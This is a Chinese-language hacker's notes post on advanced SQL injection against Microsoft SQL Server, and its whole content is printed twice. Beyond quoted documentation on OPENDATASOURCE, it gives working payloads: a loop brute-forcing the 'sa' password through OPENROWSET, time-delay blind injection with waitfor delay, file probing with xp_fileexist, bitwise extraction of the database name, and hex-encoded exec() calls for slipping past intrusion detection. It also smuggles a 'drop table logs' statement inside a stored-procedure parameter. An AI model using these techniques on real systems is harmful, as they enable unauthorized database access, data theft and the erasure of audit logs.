Mssql高级注入笔记II
OPENDATASOURCE 不接受参数变量。
与 OPENROWSET 函数类似,OPENDATASOURCE 应该只引用那些不经常访问的 OLE DB 数据源。对于访问次数稍多的任何数据源,请为它们定义链接的服务器。无论 OPENDATASOURCE 还是 OPENROWSET 都不能提供链接的服务器定义的全部功能,例如,安全管理以及查询目录信息的能力。每次调用 OPENDATASOURCE 时,都必须提供所有的连接信息(包括密码)。
示例
下面的示例访问来自某个表的数据,该表在 SQL Server 的另一个实例中。
SELECT *
FROM OPENDATASOURCE(
''SQLOLEDB'',
''Data Source=ServerName;User ID=MyUID;Password=MyPass''
).Northwind.dbo.Categories
下面是个查询的示例,它通过用于 Jet 的 OLE DB 提供程序查询 Excel 电子表格。
SELECT *
FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',
''Data Source="c:\Finance\account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions
针对MSDASQL 用存储过程建立的sql连接,在blackbox测试中,好象没什么注入区别
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N''abcdefghijklmnopqrstuvwxyz0123456789!_''
select @pwd_len = 8
select @username = ''sa''
while @i < @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N''select * from
OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid='' + @username +
N'';pwd='' + @pwd + N'''''',''''select @@version'''')''
exec xp_execresultset @query, N''master''
--check for success
(code deleted)
-- increment the password
(code deleted)
end
盲注技巧之一,时间延缓(可以加一个循环函数,运行查询时间越久说说明当前字段正确)
if (select user) = ''sa'' waitfor delay ''0:0:5''
if exists (select * from pubs..pub_info) waitfor delay ''0:0:5''
create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
insert into pubs..tmp_file exec master..xp_fileexist ''c:\boot.ini''
if exists (select * from pubs..tmp_file) waitfor delay ''0:0:5''
if (select is_file from pubs..tmp_file) > 0 waitfor delay ''0:0:5''
字符对比
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor
delay ''0:0:5''
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 0))) > 0 waitfor delay ''0:0:5''
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 1))) > 0 waitfor delay ''0:0:5''
编码的秘密,饶过IDS
declare @q varchar(8000)
select @q = 0x73656c65637420404076657273696f6e
exec(@q)
This runs ''select @@version'', as does:
declare @q nvarchar(4000)
select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00
exec(@q)
In the stored procedure example above we saw how a ''sysname'' parameter can contain
multiple SQL statements without the use of single quotes or semicolons:
sp_msdropretry [foo drop table logs select * from sysobjects], [bar]
嘻嘻,不知道这次被转走以后会不会看到偶的名字呢?~要有的话,就把高级注入笔记I也发出来
与 OPENROWSET 函数类似,OPENDATASOURCE 应该只引用那些不经常访问的 OLE DB 数据源。对于访问次数稍多的任何数据源,请为它们定义链接的服务器。无论 OPENDATASOURCE 还是 OPENROWSET 都不能提供链接的服务器定义的全部功能,例如,安全管理以及查询目录信息的能力。每次调用 OPENDATASOURCE 时,都必须提供所有的连接信息(包括密码)。
示例
下面的示例访问来自某个表的数据,该表在 SQL Server 的另一个实例中。
SELECT *
FROM OPENDATASOURCE(
''SQLOLEDB'',
''Data Source=ServerName;User ID=MyUID;Password=MyPass''
).Northwind.dbo.Categories
下面是个查询的示例,它通过用于 Jet 的 OLE DB 提供程序查询 Excel 电子表格。
SELECT *
FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',
''Data Source="c:\Finance\account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions
针对MSDASQL 用存储过程建立的sql连接,在blackbox测试中,好象没什么注入区别
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N''abcdefghijklmnopqrstuvwxyz0123456789!_''
select @pwd_len = 8
select @username = ''sa''
while @i < @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N''select * from
OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid='' + @username +
N'';pwd='' + @pwd + N'''''',''''select @@version'''')''
exec xp_execresultset @query, N''master''
--check for success
(code deleted)
-- increment the password
(code deleted)
end
盲注技巧之一,时间延缓(可以加一个循环函数,运行查询时间越久说说明当前字段正确)
if (select user) = ''sa'' waitfor delay ''0:0:5''
if exists (select * from pubs..pub_info) waitfor delay ''0:0:5''
create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
insert into pubs..tmp_file exec master..xp_fileexist ''c:\boot.ini''
if exists (select * from pubs..tmp_file) waitfor delay ''0:0:5''
if (select is_file from pubs..tmp_file) > 0 waitfor delay ''0:0:5''
字符对比
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor
delay ''0:0:5''
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 0))) > 0 waitfor delay ''0:0:5''
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 1))) > 0 waitfor delay ''0:0:5''
编码的秘密,饶过IDS
declare @q varchar(8000)
select @q = 0x73656c65637420404076657273696f6e
exec(@q)
This runs ''select @@version'', as does:
declare @q nvarchar(4000)
select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00
exec(@q)
In the stored procedure example above we saw how a ''sysname'' parameter can contain
multiple SQL statements without the use of single quotes or semicolons:
sp_msdropretry [foo drop table logs select * from sysobjects], [bar]
嘻嘻,不知道这次被转走以后会不会看到偶的名字呢?~要有的话,就把高级注入笔记I也发出来